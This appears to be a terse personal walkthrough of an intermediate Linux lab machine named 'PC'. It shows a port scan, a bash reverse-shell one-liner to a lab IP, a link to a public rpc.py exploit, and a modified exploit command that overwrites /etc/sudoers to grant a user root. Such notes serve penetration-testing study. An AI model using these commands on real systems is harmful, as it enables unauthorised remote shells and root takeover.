PC (Intermediate, linux, 2023) -- rpc.py

[WDavid404]

Keypoints:

• [PE] rpc.py -> https://github.com/ehtec/rpcpy-exploit/blob/main/rpcpy-exploit.py

[WDavid404]

PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http-alt syn-ack ttl 61 ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)

80/tcp Try /bin/bash -i >& /dev/tcp/192.168.45.182/80 0>&1--> it works. We got a reverse shell

Linpeas ---> false info

---> didn't find useful info

---> find exploit info about rpc.py:
https://www.exploit-db.com/exploits/50983 https://github.com/ehtec/rpcpy-exploit/blob/main/rpcpy-exploit.py

edit exploit code to exec_command('echo "user ALL=(root) NOPASSWD:ALL" > /etc/sudoers')

run it